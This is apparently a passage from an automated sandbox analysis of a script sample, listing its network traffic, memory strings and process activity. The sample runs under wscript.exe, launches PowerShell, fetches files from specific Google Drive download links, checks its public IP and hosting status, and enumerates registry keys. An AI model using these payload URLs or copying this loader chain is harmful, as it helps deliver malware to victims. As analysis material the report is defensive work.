Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=11UG7RVZG7jjd35VnmVWbUd2Di0bkRH_h HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=11UG7RVZG7jjd35VnmVWbUd2Di0bkRH_h&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: powershell.exe, 00000003.00000002.2960827104.0000026D5EFE7000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.v |
Source: wscript.exe, 00000000.00000003.2110367714.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2111079924.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109551833.000001D9941CF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000003.1998762736.000001D99629D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989814145.000001D996279000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1990131863.000001D9962A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989700652.000001D99622D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2111762406.000001D9961F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989437014.000001D9962A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998511091.000001D99627B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.1989814145.000001D996279000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1990131863.000001D9962A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989700652.000001D99622D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2f79ca1147483 |
Source: wscript.exe, 00000000.00000003.2110367714.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2111079924.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109551833.000001D9941CF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabD |
Source: wscript.exe, 00000000.00000003.1989700652.000001D99622D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1989950107.000001D996255000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2f79ca1147 |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A61000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46C81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46C81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A23000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D489B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPskP |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D4710D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D4710D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1hJyvgAVbPJ75WNnYmHvpQDkE9KTfZPsk&export=download |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D46EA6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47F20000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000003.00000002.2805316502.0000026D47109000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2805316502.0000026D48A27000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" |